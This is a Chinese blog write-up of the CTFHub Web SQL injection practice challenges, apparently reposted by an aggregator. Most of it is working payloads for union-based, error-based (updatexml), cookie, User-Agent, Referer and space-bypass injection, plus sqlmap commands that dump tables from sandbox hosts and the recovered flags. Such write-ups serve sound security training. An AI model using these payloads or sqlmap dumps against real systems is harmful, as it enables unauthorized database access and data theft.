CTFHub技能树 Web-SQL注入详解
Posted 星球守护者
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CTFHub技能树 Web-SQL注入详解相关的知识,希望对你有一定的参考价值。
文章目录
0x01 整数型注入
解题WP
第一步 尝试闭合点
第二步 判断列数
id=1 order by 2 页面正常
id=1 order by 3 页面未回显数据
第三步 联合查询,判断回显位置
/?id=-1 union select 1,2
第四步 执行数据库语句
-1 union select 1,database()
第五步 查询当前数据库下的表名
id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
第六步 查询表下的字段
?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'
第七步 输入字段值
?id=-1 union select 1,flag from sqli.flag
0x02 字符型注入
解题WP
第一步 闭合方式
/?id=1' --+'
第二步 查看回显字段的位数
id=1' order by 2 --+' 页面正常
id=1' order by 3 --+' 页面未回显数据
第三步 判断回显的位置
-1' union select 1,2 --+'
sqlmap -u http://challenge-e9227c10fafe8768.sandbox.ctfhub.com:10800/?id=1 --dbs
sqlmap -u http://challenge-e9227c10fafe8768.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables
sqlmap -u http://challenge-e9227c10fafe8768.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns
sqlmap -u http://challenge-e9227c10fafe8768.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump
0x03 报错注入
第一步 判断注入
id=1页面回显正常
id=1'发现页面报错,回显数据库错误信息
第二步 使用updatexml注入,数据库名称
updatexml(xml_document,xpath_string,new_value)
第一个参数:xml_document,为xml文档对象名称,是数据库x库的doc字段
第二个参数:xpath_string:xpath语法
第三个参数:new_value:替换查找到的符合条件的字符(string)
/?id=1 and updatexml(1,concat(0x5e,database()),1)
第三步 获取表名
编解码在线工具
https://www.toolhelper.cn/
/?id=1 and updatexml(1,concat(0x5e,(select group_concat(table_name) from information_schema.tables where table_schema=0x73716c69),0x5e),1)
第四步 获取字段
/?id=1 and updatexml(1,concat(0x5e,(select group_concat(column_name) from information_schema.columns where table_name=0x666c6167),0x5e),1)
第五步 获取字段值
/?id=1 and updatexml(1,concat(0x5e,(select flag from sqli.flag),0x5e),1)
发先flag少了一部分
mid 就可以得到flag后面的一部分
/?id=1 and updatexml(1,concat(0x5e,mid((select flag from sqli.flag),32),0x5e),1)
0x04 布尔盲注
--dbs
-D sqli --tables
-D sqli -T flag columns --dump
sqlmap -u "http://challenge-70a9e8b793dd9d2b.sandbox.ctfhub.com:10800/?id=1" --dbs
sqlmap -u "http://url/?id=1" -D sqli --tables --batch
sqlmap -u "http://url/?id=1" -D sqli -T flag --columns --batch
sqlmap -u "http://url/?id=1" -D sqli -T flag -C flag --dump --batch
ctfhubc04dd02440c0191e73caad9c
0x05 时间盲注
--dbs
-D sqli --tables
-D sqli -T flag --columns
-D sqli -T flag -C flag --dump
--batch
0x06 mysql结构
--dbs
-D sqli --tables
-D sqli -T whvvzxswne columns --dump
sqlmap -u http://url/?id=1 -D sqli -T qtcwgcmzbh -C jkcwouoqak --dump --batch
ctfhubf37e47264f12f73fe5129649
0x07 Cookie注入
第一步 确定闭合
Cookie: id=1 数字型注入
第二步 查看回显字段的位数
Cookie: id=1 order by 2; 页面正常
Cookie: id=1 order by 3; 页面异常
第三步 使用union查询,查看回显位置
Cookie: id=-1 union select 1,2;
第四步 查看当前数据库
Cookie: id=-1 union select 1,database();
第五步 查看表名
Cookie: id=-1 union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1);
trxfffaswl
news
第六步 查询字段
Cookie: id=-1 union select 1,(select column_name from information_schema.columns where table_schema=database() and table_name='trxfffaswl' limit 0,1);
brdjzysggi
第七步 查看字段值
Cookie: id=-1 union select 1,(select brdjzysggi from trxfffaswl limit 0,1);
0x08 空格绕过
第一步 确定闭合
?id=1/**/or/**/1=1 //测试or,and等特殊字符是否被过滤
第二步 查看回显字段的位数
?id=1/**/order/**/by/**/2;页面正常
?id=1/**/order/**/by/**/3; 页面异常
第三步 使用union查询,查看回显位置
?id=-1/**/union/**/select/**/1,2
第四步 查看当前数据库
-1/**/union/**/select/**/1,database()
第五步 查看表名
表明1
?id=-1/**/union/**/select/**/1,(select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'/**/limit/**/0,1)
表名2
?id=-1/**/union/**/select/**/1,(select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'/**/limit/**/1,1)
ID: imrqzusgig
Data: news
第六步 查询字段
?id=-1/**/union/**/select/**/1,(select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='sqli'/**/and/**/table_name='imrqzusgig'/**/limit/**/0,1)
Data: sxiiqtwdft
第七步 查看字段值
?id=-1/**/union/**/select/**/1,(select/**/sxiiqtwdft/**/from/**/imrqzusgig/**/limit/**/0,1)
0x09 UA注入
第一步 构造闭合
1 or 1=2 页面回显正常
1 and 1=2
第二步 查询列数量
1 order by 1,2,3 页面报错
1 order by 1,2 页面正常
第三步 判断回显,查询数据库
-1 union select 1,2
-1 union select 1,database()
第四步 查看表名称
-1 union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1)
cutmmwbdxt
news
第五步 查看字段名称
-1 union select 1,(select column_name from information_schema.columns where table_schema=database() and table_name='cutmmwbdxt' limit 0,1)
iezonoaoey
第六步 查看字段值
-1 union select 1,(select iezonoaoey from cutmmwbdxt limit 0,1)
ctfhub509b5eecd5afe7a69925baad
0x10 Refer注入
第一步 构造闭合
1 or 1=2 页面回显正常
1 and 1=2
第二步 查询列数量
1 order by 1,2,3 页面报错
1 order by 1,2 页面正常
第三步 判断回显,查询数据库
-1 union select 1,2
-1 union select 1,database()
第四步 查看表名称
-1 union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1)
skwdbewppe
news
第五步 查看字段名称
-1 union select 1,(select column_name from information_schema.columns where table_schema=database() and table_name='skwdbewppe' limit 0,1)
lmdptzbbsz
第六步 查看字段值
-1 union select 1,(select lmdptzbbsz from skwdbewppe limit 0,1)
ctfhub696d71da4c29a525eb09512d
所有的SQL注入完成
总结
level有5级,越高检测越全,默认为 1
--level 1 检测Get和Post
--level 2 检测HTTP Cookie
--level 3 检测User-Agent和Referer
--level 4 检测
--level 5 检测 HOST 头
risk有3级,级别越高风险越大,默认为1
--risk 2 会在默认的检测上添加大量时间型盲注语句测试
--risk 3 会在原基础上添加OR 类型的布尔型盲注 ,可能会update导致修改数据库
摘抄
如果你有一堆苹果,有好有坏,你应该先吃好的,把烂的扔掉。如果你先吃坏的,好的也会变坏,你就永远吃不到好的,这就是苹果定律。
苹果定律告诉我们,人必须善于取舍,要记住先做你生命中最重要的事。
仔细想想,人生曾有多少次机遇被我们错过,有多少重要的事被我们割舍。每个阶段都有不同的目标,找到当下最核心最重要的事,是一个人最大的本事和能力。
---《苹果定律》
以上是关于CTFHub技能树 Web-SQL注入详解的主要内容,如果未能解决你的问题,请参考以下文章